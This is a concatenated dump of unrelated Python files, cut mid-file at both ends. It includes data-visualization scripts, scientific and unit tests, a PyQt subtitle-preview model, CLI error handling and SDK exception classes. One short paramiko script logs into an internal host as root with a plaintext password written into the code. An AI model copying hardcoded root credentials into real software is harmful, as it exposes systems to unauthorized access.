ALL_ITEMS[ITEM_INDEX][2] # # WB.save("name.xlsx") #!/usr/bin/env python # Usage: # starting with a results file in your ~/.spack/analyzers/spack-monitor, run as follows: # python visualize-predictions.py ~/.spack/spack-monitor/analysis/curl/symbolator-predictions.json # Note the directory name is the package being spliced import numpy as np import seaborn as sns import matplotlib.pyplot as plt import jsonschema import shutil import pandas import sys import json import os # Also validate to ensure we have the right format from spliced.schemas import spliced_result_schema here = os.environ.get("GITHUB_WORKSPACE") or os.getcwd() def write_json(obj, filename): with open(filename, "w") as fd: fd.write(json.dumps(obj, indent=4)) def read_json(filename): with open(filename, "r") as fd: content = json.loads(fd.read()) return content template = """--- title: Package %s Experiment %s results categories: packages tags: [package] permalink: /results/%s/%s/ %s maths: 1 toc: 1 --- """ def plot_clustermap(df, save_to=None): sns.set_theme(style="white") f, ax = plt.subplots(figsize=(30, 30)) # Generate a custom diverging colormap cmap = sns.color_palette() # cmap = sns.diverging_palette(230, 20, as_cmap=True) # Draw the heatmap with the mask and correct aspect ratio p = sns.clustermap( df, cmap=cmap, center=0, square=True, linewidths=0.5, cbar_kws={"shrink": 0.5} ) # used for heatmap # p.tick_params(labelsize=5) # p.set_xlabel("Splice", fontsize=12) # p.set_ylabel("Binary", fontsize=12) if save_to: plt.savefig(save_to) return plt def plot_heatmap(df, save_to=None): sns.set_theme(style="white") f, ax = plt.subplots(figsize=(10, 12)) # Generate a custom diverging colormap cmap = sns.color_palette() # cmap = sns.diverging_palette(230, 20, as_cmap=True) # Draw the heatmap with the mask and correct aspect ratio p = sns.heatmap( df, cmap=cmap, center=0, square=True, linewidths=0.5, cbar_kws={"shrink": 0.5} ) # used for heatmap # p.tick_params(labelsize=5) # p.set_xlabel("Splice", fontsize=12) # 
p.set_ylabel("Binary", fontsize=12) if save_to: plt.savefig(save_to) return plt def main(pkg_dir): if not os.path.exists(pkg_dir): sys.exit("Cannot find %s" % pkg_dir) # There are TWO levels of informatoin # 1. The top level package / splice "was it successful or not (and if not why) # 2. The second level specific results for a splice "is this predicted to work (or not)" # For now I'm going to try and visualize the top, and then present the next levels in a table # We will create rows / cols for each splice rows = set() # package cols = set() # splices testers = set() # Unique result types result_types = set() package = os.path.basename(pkg_dir) # assumes same command across commands = set() # Results will be a table of results for each predictor results = {"failed": []} # Assemble experiments for pkg in os.listdir(os.path.abspath(pkg_dir)): # These are matrix entries # curl-7.53.1-splice-zlib-with-zlib-experiment-curl for experiment in os.listdir(os.path.join(pkg_dir, pkg)): for result_file in os.listdir(os.path.join(pkg_dir, pkg, experiment)): result_file = os.path.join(pkg_dir, pkg, experiment, result_file) data = read_json(result_file) try: jsonschema.validate(data, schema=spliced_result_schema) except: print( "%s is not valid for the current result schema." % result_file ) continue for datum in data: # Top level results for the visualization go here cols.add(datum.get("splice")) rows.add(datum.get("package")) result_types.add(datum.get("result")) # If we don't have predictions, add to "failed" tester has_predictions = False for tester, resultlist in datum["predictions"].items(): if not resultlist: continue testers.add(tester) if tester not in results: results[tester] = [] # We can't assume the testers have the exact same testing set (but they can) for res in resultlist: has_predictions = True # We add binaries/libs that we have predictions for results[tester].append( { "binary": res.get("binary"), "lib": res.get("lib"), "prediction": res.get("prediction"), "message": res.get("message"), "return_code": res.get("return_code"), "command": res.get("command"), "splice": datum.get("splice"), "package": datum.get("package"), "result": datum.get("result"), } ) if not has_predictions: results["failed"].append( { "binary": None, "lib": None, "prediction": None, "message": None, "return_code": None, "command": None, "splice": datum.get("splice"), "package": datum.get("package"), "result": datum.get("result"), } ) print("Found %s testers: %s" % (len(testers), " ".join(testers))) # Create top level data frame df = pandas.DataFrame(0, index=rows, columns=cols) # Assign each outcome a number outcomes = {result_type: i + 1 for i, result_type in enumerate(result_types)} # Populate outcomes for pkg in os.listdir(os.path.abspath(pkg_dir)): for experiment in os.listdir(os.path.join(pkg_dir, pkg)): for result_file in os.listdir(os.path.join(pkg_dir, pkg, experiment)): result_file = os.path.join(pkg_dir, pkg, experiment, result_file) data = read_json(result_file) try: jsonschema.validate(data, schema=spliced_result_schema) except: continue for datum in data: # Top level results for the visualization go here colname = datum.get("splice") rowname = datum.get("package") outcome = outcomes[datum.get("result")] df.loc[rowname, colname] = outcome # Save results to file under docs experiment = experiment.split("-")[0] result_dir = os.path.join(here, "docs", "_results", package, experiment) if not os.path.exists(result_dir): os.makedirs(result_dir) listing = "" # Save the json to file write_json(results, 
os.path.join(result_dir, "results-list.json")) df.to_json(os.path.join(result_dir, "results-table.json")) write_json(outcomes, os.path.join(result_dir, "outcomes.json")) # Plot basics no_results = False if df.shape[1] == 0: print("Warning - empty data frame! No results to show for %s" % pkg_dir) no_results = True elif df.shape[1] > 1: save_to = os.path.join(result_dir, "%s-%s.pdf" % (experiment, package)) fig = plot_clustermap(df, save_to) save_to = os.path.join(result_dir, "%s-%s.png" % (experiment, package)) fig = plot_clustermap(df, save_to) save_to = os.path.join(result_dir, "%s-%s.svg" % (experiment, package)) fig = plot_clustermap(df, save_to) else: save_to = os.path.join(result_dir, "%s-%s.pdf" % (experiment, package)) fig = plot_heatmap(df, save_to) save_to = os.path.join(result_dir, "%s-%s.png" % (experiment, package)) fig = plot_heatmap(df, save_to) save_to = os.path.join(result_dir, "%s-%s.svg" % (experiment, package)) fig = plot_heatmap(df, save_to) # Save the filenames for images if not no_results: listing += "png: %s-%s.png\n" % (experiment, package) listing += "svg: %s-%s.svg\n" % (experiment, package) listing += "pdf: %s-%s.pdf\n" % (experiment, package) # And the entry for the results listing += "results: results-list.json\n" listing += "outcomes: %s\n" % outcomes # Generate a markdown for each content = template % (package, experiment, package, experiment, listing) md = os.path.join(result_dir, "index.md") with open(md, "w") as fd: fd.write(content) if __name__ == "__main__": if len(sys.argv) < 2: sys.exit( "Please provide the path to a package folder: python visualize-predictions.py artifacts/curl" ) main(sys.argv[1]) # -*- coding: UTF-8 -*- import paramiko ,color ,sys reload(sys) sys.setdefaultencoding('GBK') col = color.Color() def changetime(): print u"你将改变测试环境(192.168.0.22)的日期。" s = paramiko.SSHClient() s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) s.connect('192.168.0.22' ,22 ,'root' ,'fgoods.com') stdin, stdout, stderr = s.exec_command('ping -c 2 192.168.0.22') print stdout.read() if __name__ == '__main__': changetime()from collections import namedtuple from itertools import combinations from math import isclose, pi, sqrt import pytest PointTrioAngle = namedtuple("PointTrioAngle", ["point1", "point2", "vertex", "angle"]) Triangle = namedtuple("Triangle", ["point1", "point2", "point3", "area"]) Line = namedtuple("Line", ["point1", "point2", "distance"]) angles = [ PointTrioAngle((1, 0, 0), (0, 1, 0), (0, 0, 0), pi * 0.5), PointTrioAngle((1, 0, 0), (0, 0, 1), (0, 0, 0), pi * 0.5), PointTrioAngle((0, 0, 1), (0, 1, 0), (0, 0, 0), pi * 0.5), PointTrioAngle((1, 1, 0), (0, 1, 0), (0, 0, 0), pi * 0.25), PointTrioAngle((1, 1, 1), (0, 0, 0), (0, 0, 0), 0.0), PointTrioAngle((1, 1, 1), (1, 1, 1), (0, 0, 0), 0.0), PointTrioAngle((1, 0, 0), (-1, 0, 0), (0, 0, 0), pi), PointTrioAngle((1, 0, 0), (-1, -1, 0), (0, 0, 0), pi * 0.75), PointTrioAngle((0, 0, 0), (0, 0, 0), (0, 0, 0), 0.0), ] triangles = [ Triangle((1, 0, 0), (0, 0, 0), (0, 1, 0), 0.5), Triangle((1, 0, 0), (0, 0, 0), (0, 0.5, 0), 0.25), Triangle((1, 0, 0), (0, 0, 0), (1, 0, 0), 0.0), Triangle((0, 0, 0), (0, 0, 0), (0, 0, 0), 0.0), Triangle((1, 0, 0), (-1, 0, 0), (0, 1, 0), 1.0), Triangle((1, 0, 0), (0, 0, 0), (0, 1, 0), 0.5), Triangle((1, 0, 0), (0, 1, 0), (0, 0, 1), 0.8660254038), ] lines = [ Line((0, 0, 0), (1, 0, 0), 1.0), Line((0, 0, 0), (1, 1, 0), sqrt(2.0)), Line((0, 0, -2), (0, 0, 0), 2.0), Line((0, 0, 0.0), (0, 0, 0), 0.0), ] class TestAngleQueries: @pytest.mark.parametrize("coords", angles) def 
test_anglen(self, query, mapdl, cleared, coords: PointTrioAngle): n1 = mapdl.n(1, *coords.vertex) n2 = mapdl.n(2, *coords.point1) n3 = mapdl.n(3, *coords.point2) assert isclose(query.anglen(n1, n2, n3), coords.angle) @pytest.mark.parametrize("coords", angles) def test_anglek(self, query, mapdl, cleared, coords: PointTrioAngle): k1 = mapdl.k(1, *coords.vertex) k2 = mapdl.k(2, *coords.point1) k3 = mapdl.k(3, *coords.point2) assert isclose(query.anglek(k1, k2, k3), coords.angle) class TestTriangleAreaQueries: def test_areand_order_invariant(self, mapdl, cleared): triangle = Triangle((1, 0, 0), (0, 1, 0), (0, 0, 1), 0.8660254038) n1 = mapdl.n(1, *triangle.point1) n2 = mapdl.n(2, *triangle.point2) n3 = mapdl.n(3, *triangle.point3) for combo in combinations([n1, n2, n3], 3): area = mapdl.queries.areand(*combo) print(combo) assert isclose(area, triangle.area) @pytest.mark.parametrize("triangle", triangles) def test_areand_various_triangles(self, mapdl, cleared, triangle: Triangle): n1 = mapdl.n(1, *triangle.point1) n2 = mapdl.n(2, *triangle.point2) n3 = mapdl.n(3, *triangle.point3) area = mapdl.queries.areand(n1, n2, n3) assert isclose(area, triangle.area) def test_areakp_order_invariant(self, mapdl, cleared): triangle = Triangle((1, 0, 0), (0, 1, 0), (0, 0, 1), 0.8660254038) k1 = mapdl.k(1, *triangle.point1) k2 = mapdl.k(2, *triangle.point2) k3 = mapdl.k(3, *triangle.point3) for combo in combinations([k1, k2, k3], 3): area = mapdl.queries.areakp(*combo) assert isclose(area, triangle.area) @pytest.mark.parametrize("triangle", triangles) def test_areakp_various_triangles(self, mapdl, cleared, triangle: Triangle): k1 = mapdl.k(1, *triangle.point1) k2 = mapdl.k(2, *triangle.point2) k3 = mapdl.k(3, *triangle.point3) area = mapdl.queries.areakp(k1, k2, k3) assert isclose(area, triangle.area) class TestDistanceQueries: def test_distkp_order_invariance(self, mapdl, cleared): line = Line((0, 0, 0), (1, 0, 0), 1.0) k1 = mapdl.k(1, *line.point1) k2 = mapdl.k(2, *line.point2) assert mapdl.queries.distkp(k1, k2) == mapdl.queries.distkp(k2, k1) def test_distnd_order_invariance(self, mapdl, cleared): line = Line((0, 0, 0), (1, 0, 0), 1.0) n1 = mapdl.n(1, *line.point1) n2 = mapdl.n(2, *line.point2) assert mapdl.queries.distnd(n1, n2) == mapdl.queries.distnd(n2, n1) @pytest.mark.parametrize("line", lines) def test_distnd(self, mapdl, cleared, line: Line): n1 = mapdl.n(1, *line.point1) n2 = mapdl.n(2, *line.point2) distance = mapdl.queries.distnd(n1, n2) assert isclose(distance, line.distance) @pytest.mark.parametrize("line", lines) def test_distkp(self, mapdl, cleared, line: Line): k1 = mapdl.k(1, *line.point1) k2 = mapdl.k(2, *line.point2) distance = mapdl.queries.distkp(k1, k2) assert isclose(distance, line.distance) import json import string import random def getlistfromfile(file_path): extractedlist = [] with open(file_path) as file_with_list: for listline in file_with_list: extractedlist.append(listline.rstrip()) return extractedlist def random_generator_upper(min_char, max_char, chars2=string.ascii_uppercase + string.digits): uppercharz = string.ascii_uppercase + "_" prefix = "".join(random.choice(uppercharz) for x in range(1)) suffix = "".join(random.choice(chars2) for x in range(random.randint(min_char, max_char))) return prefix + suffix def dedup(seq): deduped_seq = [] seen = set() for list_elem in seq: list_elem_added = False if list_elem['theformer'] not in seen: seen.add(list_elem['theformer']) list_elem_added = True if list_elem_added: deduped_seq.append(list_elem) return deduped_seq def 
loadjsonfile(source_json_file): with open(source_json_file) as json_data: unsorted_replacers = json.load(json_data) sorted_replacers = sorted(unsorted_replacers, key=lambda x: len(x['theformer']), reverse=True) return dedup(sorted_replacers) def savejsonfile(new_file_name, json_data): with open(new_file_name, 'w') as outfile: json.dump(json_data, outfile) benjeffery/mccortex #!/usr/bin/env python from __future__ import print_function try: input = raw_input except: pass import sys import csv import re # # Read in distance matrices between raw, clean and perfect graphs for k=... # output table: kmer,nkmers,raw_nkmers,raw_nreal,clean_nkmers,clean_nreal # def usage(argv,err=None): if err is not None: print(err,file=sys.stderr) print("usage: python",argv[0]," ...",file=sys.stderr) exit(-1) def load_csv(csvpath): m = [] with open(csvpath) as csvpath: csvreader = csv.reader(csvpath, delimiter='\t', quotechar='"') next(csvreader) # skip first row (column headers) for row in csvreader: m.append([ 0 if x == '.' else int(x) for x in row[1:]]) return m def main(argv): if len(argv) <= 1: usage(argv) sep = ',' print("# Number of kmers in the perfect, raw and cleaned graphs") print("# _nreal is the number of real kmers in the raw/cleaned graph") print("# raw_errs, clean_errs are the fraction of error kmers in each graph") print("# frac_remove_errs is the fraction of kmers removed that were seqn errs") print(sep.join(["kmer","nkmers", "raw_nkmers","raw_nreal", "clean_nkmers","clean_nreal", "raw_errs","clean_errs", "frac_remove_errs"])) for f in argv[1:]: match = re.search('k([0-9]+)', f) k = match.group(1) m = load_csv(f) nkmers = m[2][2] raw_nkmers,raw_nreal = m[0][0],m[0][2] clean_nkmers,clean_nreal = m[1][1],m[1][2] raw_errs = (raw_nkmers-raw_nreal)/float(raw_nkmers) clean_errs = (clean_nkmers-clean_nreal)/float(clean_nkmers) kmers_removed = raw_nkmers-clean_nkmers real_kmers_removed = raw_nreal-clean_nreal frac_remove_errs = 1.0 - float(real_kmers_removed)/kmers_removed r = [k,m[2][2],m[0][0],m[0][2],m[1][1],m[1][2], "%.5f"%raw_errs,"%.5f"%clean_errs,"%.5f"%frac_remove_errs] print(sep.join([str(x) for x in r])) if __name__ == '__main__': main(sys.argv) import argparse from data_preproc import fast_preproc def main(args): fast_preproc(args.in_path, args.out_path, args.lang) if __name__ == "__main__": parser = argparse.ArgumentParser( description='data for kor_summ' ) parser.add_argument('--in_path', required=True, help='root of input data') parser.add_argument('--out_path', required=True, help='path of outputs') parser.add_argument('--lang', type=str, action='store', default='en', help='language articles written in') args = parser.parse_args() main(args) ## python temp_preproc.py --in_path=../test_path/in/ --out_path=../test_path/out/ --lang=ko # python3 temp_preproc.py --in_path=/content/fast_abs_rl/corea_dailynews/finished_files/news_train_mini.json \ # --out_path=/content/fast_abs_rl/corea_dailynews/finished_files/train --lang=ko# Code from Chapter 10 of Machine Learning: An Algorithmic Perspective (2nd Edition) # by (http://stephenmonika.net) # You are free to use, change, or redistribute the code in any way you wish for # non-commercial purposes, but please maintain the name of the original author. # This code comes with no warranty of any kind. 
# , 2008, 2014 # The Population Based Incremental Learning algorithm # Comment and uncomment fitness functions as appropriate (as an import and the fitnessFunction variable) import pylab as pl import numpy as np # import fourpeaks as fF def PBIL(): pl.ion() populationSize = 100 stringLength = 20 eta = 0.005 # fitnessFunction = 'fF.fourpeaks' fitnessFunction = 'fF.knapsack' p = 0.5 * np.ones(stringLength) best = np.zeros(501, dtype=float) for count in range(501): # Generate samples population = np.random.rand(populationSize, stringLength) for i in range(stringLength): population[:, i] = np.where(population[:, i] < p[i], 1, 0) # Evaluate fitness fitness = eval(fitnessFunction)(population) # Pick best best[count] = np.max(fitness) bestplace = np.argmax(fitness) fitness[bestplace] = 0 secondplace = np.argmax(fitness) # Update vector p = p * (1 - eta) + eta * ((population[bestplace, :] + population[secondplace, :]) / 2) if (np.mod(count, 100) == 0): print(count, best[count]) pl.plot(best, 'kx-') pl.xlabel('Epochs') pl.ylabel('Fitness') pl.show() # print p PBIL() tb365/mcclient_python1-10 from yunionclient.common import base class SSHRelayManager(base.Manager): service_type = 'sshrelay' def get_connections(self): resp, body = self.json_request('GET', r'/ssh/connections') return body['connections'] shreyassks/Text-Similarity-App-GKEGKE-engine/app/__init__.py # -*- coding: utf-8 -*- from flask import Flask import google.cloud.logging import logging client = google.cloud.logging.Client() client.setup_logging() app = Flask(__name__) if app.config["ENV"] == "production": app.config.from_object("config.ProductionConfig") else: app.config.from_object("config.DevelopmentConfig") print("Environment in use :- ", str(app.config["ENV"])) from app import main 10-100 """ Initial history Revision ID: 3d0b226940eb Revises: """ import sqlalchemy as sa from alembic import op # revision identifiers, used by Alembic. revision = '3d0b226940eb' down_revision = '' branch_labels = None depends_on = None def upgrade(): op.create_table('label_history', sa.Column('id', sa.Integer(), nullable=False), sa.Column('label_name', sa.String(), nullable=True), sa.Column('label_state_machine', sa.String(), nullable=True), sa.Column('created', sa.DateTime(), nullable=True), sa.Column('forced', sa.Boolean(), nullable=True), sa.Column('old_state', sa.String(), nullable=True), sa.Column('new_state', sa.String(), nullable=True), sa.ForeignKeyConstraint(['label_name', 'label_state_machine'], ['labels.name', 'labels.state_machine'], ), sa.PrimaryKeyConstraint('id'), ) def downgrade(): op.drop_table('label_history') """ Copyright 2019 Samsung SDS Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
""" from brightics.function.clustering.agglomerative_clustering import agglomerative_clustering from brightics.common.datasets import load_iris import unittest import pandas as pd import numpy as np class AgglomerativeClustering(unittest.TestCase): def setUp(self): print("*** Aggromerative UnitTest Start ***") self.testdata = load_iris() def tearDown(self): print("*** Aggromerative UnitTest End ***") def test(self): ac_train = agglomerative_clustering(self.testdata, input_cols=['sepal_length', 'sepal_width', 'petal_length', 'petal_width'], n_clusters=3) labels = ac_train['out_table']['prediction'] np.testing.assert_array_equal(labels, [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 2, 2, 2, 2, 0, 2, 2, 2, 2, 2, 2, 0, 0, 2, 2, 2, 2, 0, 2, 0, 2, 0, 2, 2, 0, 0, 2, 2, 2, 2, 2, 0, 0, 2, 2, 2, 0, 2, 2, 2, 0, 2, 2, 2, 0, 2, 2, 0]) TFarla/subs2srs-cross-platformsubs2srs/gui/models/preview_model.py import re from subs2srs.gui.globalobject import GlobalObject from PyQt5.QtWidgets import * from PyQt5.QtGui import * from PyQt5.QtCore import * from subs2srs.core.extractor import Extractor from subs2srs.core.subtitle import Subtitle from subs2srs.gui.preview import Preview from subs2srs.gui.state import State, StatePreview from typing import List from subs2srs.gui.main_widget import MainWidget from subs2srs.core.preview_item import PreviewItem from PyQt5.QtMultimedia import QSoundEffect, QSound, QAudioFormat, QAudioOutput from subs2srs.gui.audio import Audio class PreviewModel: def __init__(self, app: QMainWindow, state: State): super().__init__() self._app = app self._state = state GlobalObject().addEventListener("preview", self.doPreview) GlobalObject().addEventListener("backToMain", self.toMain) GlobalObject().addEventListener("previewSelectionChange", self.changeSelection) GlobalObject().addEventListener("previewDeactivate", self.inactivateLines) GlobalObject().addEventListener("previewActivate", self.activateLines) GlobalObject().addEventListener("previewSelectAll", self.selectAllPreview) GlobalObject().addEventListener("previewSelectNone", self.selectNonePreview) GlobalObject().addEventListener("previewSelectInvert", self.selectInvertPreview) GlobalObject().addEventListener("previewAdio", self.playAudio) def table(self): preview_table: QTableWidget = self._app.findChild( QTableWidget, "Preview.Table") if not preview_table: return None return preview_table @pyqtSlot() def playAudio(self, event): preview_table = self.table() index = preview_table.selectedIndexes() row = 0 if index: row = index[0].row() item = self._state.preview.items[row] start = item.from_time / 1000 audio_bytes = self._extractor.get_audio( start, item.end_time / 1000) if self._state.preview.audio: self._state.preview.audio.stop() audio = Audio(audio_bytes) self._state.preview.audio = audio audio.play() @pyqtSlot() def selectInvertPreview(self, event): preview_table = self.table() if preview_table is None: return items = preview_table.children() row_count = preview_table.rowCount() col_count = preview_table.columnCount() i = 0 while i < row_count: j = 0 while j < col_count: item: QTableWidgetItem = preview_table.item(i, j) item.setSelected(not item.isSelected()) j = j + 1 i = i + 1 @pyqtSlot() def selectNonePreview(self, event): preview_table = self.table() if preview_table is 
None: return preview_table.clearSelection() @pyqtSlot() def selectAllPreview(self, event): preview_table = self.table() if preview_table is None: return preview_table.selectAll() @pyqtSlot() def inactivateLines(self, event): preview_table = self.table() if preview_table is None: return for i in preview_table.selectedIndexes(): i: QModelIndex self.setInactive(preview_table, i.row(), i.column()) self.updateActiveLineCount() def setInactive(self, preview_table, row_index, column_index): self._state.preview.inactive_items.add(row_index) item = preview_table.item(row_index, column_index) item.setBackground(Qt.darkRed) f = item.font() f.setStrikeOut(True) item.setFont(f) def updateActiveLineCount(self): active_label: QLabel = self._app.findChild( QLabel, "Preview.Active.Value") inactive_label: QLabel = self._app.findChild( QLabel, "Preview.Inactive.Value") inactive_count = len(self._state.preview.inactive_items) active = str(len(self._state.preview.items) - inactive_count) active_label.setText(active) inactive_label.setText(str(inactive_count)) @pyqtSlot() def activateLines(self, event): preview_table = self.table() if preview_table is None: return for i in preview_table.selectedIndexes(): i: QModelIndex index = i.row() if index in self._state.preview.inactive_items: self._state.preview.inactive_items.remove(index) item: QTableWidgetItem = preview_table.item(index, i.column()) item.setBackground(QBrush()) f = item.font() f.setStrikeOut(False) item.setFont(f) self.updateActiveLineCount() @pyqtSlot() def changeSelection(self, event): def chunks(lst, n): """Yield successive n-sized chunks from lst.""" for i in range(0, len(lst), n): yield lst[i:i + n] preview_table = self.table() if preview_table is None: return rows = chunks(preview_table.selectedItems(), preview_table.columnCount()) for row in rows: row: List[QTableWidgetItem] index = preview_table.selectedIndexes()[0] self.updateDetails(index.row()) def updateDetails(self, active_row_index): items = self._state.preview.items if len(items) > 0: item: PreviewItem = items[active_row_index] snapshot1: QTextEdit = self._app.findChild(QObject, "PreviewSub1") snapshot1.setText(item.target_sub) if item.native_sub: snapshot2: QTextEdit = self._app.findChild( QObject, "PreviewSub2") snapshot2.setText(item.native_sub) output = self._extractor.get_snapshot(item.from_time_seconds()) # TODO: update snapshot on different thread so it's non blocking l: QLabel = self._app.findChild(QLabel, "PreviewSnapshot") p = QPixmap() p.loadFromData(output) l.setPixmap(p) @pyqtSlot() def toMain(self, event): self._state.preview = StatePreview() self._app.setCentralWidget(MainWidget()) @pyqtSlot() def doPreview(self, event): self._state.preview = StatePreview() native_file = None if self._state.sub2_file: native_file = Subtitle(self._state.sub2_file) self._extractor = Extractor( media_file=self._state.video_file, target_sub=Subtitle(self._state.sub1_file), native_sub=native_file ) items = list(self._extractor.preview()) self._state.preview.items = items self._state.preview.inactive_items.add(1) preview = Preview(items) self._app.setCentralWidget(preview) self.updateDetails(0) self._app.updateGeometry() preview_table = self.table() for i, item in enumerate(items): item: PreviewItem sub = item.target_sub if not is_good_japanese(sub): self.setRowInactive(preview_table, i) self.updateActiveLineCount() def setRowInactive(self, preview_table, row_index): for i in range(preview_table.columnCount()): self.setInactive(preview_table, row_index, i) def is_good_japanese(text: str): # ( # 
    # remove: 。♪♪~
    # if len(text) < 6:
    #     return False
    if not is_japanese(text):
        return False
    # Strip full-width parenthesized cues (assumed pattern; mirrors the
    # half-width sound_re cleanup just below).
    clean = re.sub(r'（.*）', '', text).strip()
    clean = re.sub(sound_re, '', clean).strip()
    if not is_min_length(clean):
        return False
    if too_much_katakana(clean):
        return False
    if is_sung(clean):
        return False
    return True


kanji_regex = re.compile('([一-龯])')
kana_regex = re.compile('([ぁ-んァ-ン])')
japanese_regex = re.compile('([一-龯ぁ-んァ-ン])')
n_ja_re = re.compile('([^一-龯ぁ-んァ-ン])')
full_width_katakana_regex = re.compile('([ァ-ン])')
half_katakana_re = re.compile('([ァ-ン゙゚])')
sound_re = re.compile(r'(\(.*[音声]\))')


def is_japanese(text: str):
    matches = re.search(japanese_regex, text)
    return matches is not None


def is_min_length(text: str):
    kanji_match = re.findall(kanji_regex, text)
    if kanji_match:
        return len(text) > 6
    else:
        return len(text) > 8


def is_sung(text: str):
    return text[0] == "・"


def too_much_katakana(text: str):
    n = re.sub(n_ja_re, '', text)
    n = n.replace(' ', '')
    n = n.replace(' ', '')
    n = n.replace('!', '')
    n = n.replace('。', '')
    n = re.sub(full_width_katakana_regex, '', n)
    n = re.sub(half_katakana_re, '', n)
    return len(n) < 4

tests/parser/syntax/test_keccak256.py
import pytest
from pytest import (
    raises,
)
from vyper import (
    compiler,
)
from vyper.exceptions import (
    TypeMismatch,
)

type_fail_list = [
    """
@public
def foo():
    x: bytes32 = keccak256(3)
    """
]


@pytest.mark.parametrize('bad_code', type_fail_list)
def test_block_type_fail(bad_code):
    with raises(TypeMismatch):
        compiler.compile_code(bad_code)


valid_list = [
    """
@public
def foo():
    x: bytes32 = keccak256("moose")
    """,
    """
@public
def foo():
    x: bytes32 = keccak256(0x1234567890123456789012345678901234567890123456789012345678901234)
    """
]


@pytest.mark.parametrize('good_code', valid_list)
def test_block_success(good_code):
    assert compiler.compile_code(good_code) is not None

# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
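# The EB CLI bootstrap below: fix_path() prepends the bundled vendor directory
# to sys.path, run_app() maps CLI exceptions to exit codes (e.g.
# NotInitializedError -> 126, ConnectionError -> 2, most others -> 3/4/5), and
# squash_cement_logging() raises cement loggers to ERROR.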
import os import sys import logging import traceback from argparse import ArgumentTypeError from botocore.compat import six from ebcli.lib.aws import TooManyPlatformsError from cement.core.exc import CaughtSignal from ebcli.core import io from ebcli.objects.exceptions import ( ConnectionError, NoEnvironmentForBranchError, InvalidStateError, NotInitializedError, NoSourceControlError, NoRegionError, EBCLIException ) from ebcli.resources.strings import strings iteritems = six.iteritems def fix_path(): parent_folder = os.path.dirname(__file__) parent_dir = os.path.abspath(parent_folder) while not parent_folder.endswith('ebcli'): parent_folder = os.path.dirname(parent_folder) parent_dir = os.path.abspath(parent_folder) vendor_dir = os.path.join(parent_dir, 'bundled') sys.path.insert(0, vendor_dir) fix_path() def run_app(app): squash_cement_logging() try: app.setup() app.run() app.close() except CaughtSignal: io.echo() app.close(code=5) except NoEnvironmentForBranchError: app.close(code=5) except InvalidStateError: io.log_error(strings['exit.invalidstate']) app.close(code=3) except NotInitializedError: io.log_error(strings['exit.notsetup']) app.close(code=126) except NoSourceControlError: io.log_error(strings['sc.notfound']) app.close(code=3) except NoRegionError: io.log_error(strings['exit.noregion']) app.close(code=3) except ConnectionError: io.log_error(strings['connection.error']) app.close(code=2) except ArgumentTypeError: io.log_error(strings['exit.argerror']) app.close(code=4) except TooManyPlatformsError: io.log_error(strings['toomanyplatforms.error']) app.close(code=4) except EBCLIException as e: if '--verbose' in sys.argv or '--debug' in sys.argv: io.log_info(traceback.format_exc()) else: io.log_error('{0} - {1}'.format(e.__class__.__name__, e.message)) app.close(code=4) except Exception as e: if str(e): message = '{exception_class} - {message}'.format( exception_class=e.__class__.__name__, message=str(e) ) else: message = '{exception_class}'.format( exception_class=e.__class__.__name__ ) if '--verbose' in sys.argv or '--debug' in sys.argv: io.log_info(traceback.format_exc()) io.log_info(message) else: io.log_error(message) app.close(code=4) def squash_cement_logging(): for d, k in iteritems(logging.Logger.manager.loggerDict): if d.startswith('cement') and isinstance(k, logging.Logger): k.setLevel('ERROR') #!/usr/bin/env python # -*- coding: utf-8 -*- class Goose(object): @property def name(self): return "Mr Stabby" class Hamster(object): @property def name(self): return "Phil" class _SecretSquirrel(object): @property def name(self): return "Mr Anonymous"eitansela/sagemaker-python-sdk1-10 # Copyright 2019-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. 
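# Hypothetical usage sketch (the estimator name is an assumption, not part of
# this module): callers can catch the exception defined below to inspect why a
# resource stopped in a disallowed state, e.g.
#
#     try:
#         estimator.fit(inputs)
#     except UnexpectedStatusException as err:
#         print(err.actual_status, err.allowed_statuses)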
"""Custom exception classes for Sagemaker SDK""" from __future__ import absolute_import class UnexpectedStatusException(ValueError): """Raised when resource status is not expected and thus not allowed for further execution""" def __init__(self, message, allowed_statuses, actual_status): self.allowed_statuses = allowed_statuses self.actual_status = actual_status super(UnexpectedStatusException, self).__init__(message) #!/usr/bin/env python # vim: tabstop=2 shiftwidth=2 expandtab # Copyright 2020 Maintainers of PSegs-ROS-Ext # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections import os import random import subprocess import sys import numpy as np ############################################################################### ### Utils def nanostamp_to_rostime(nanostamp): import rospy # For a good time see: # 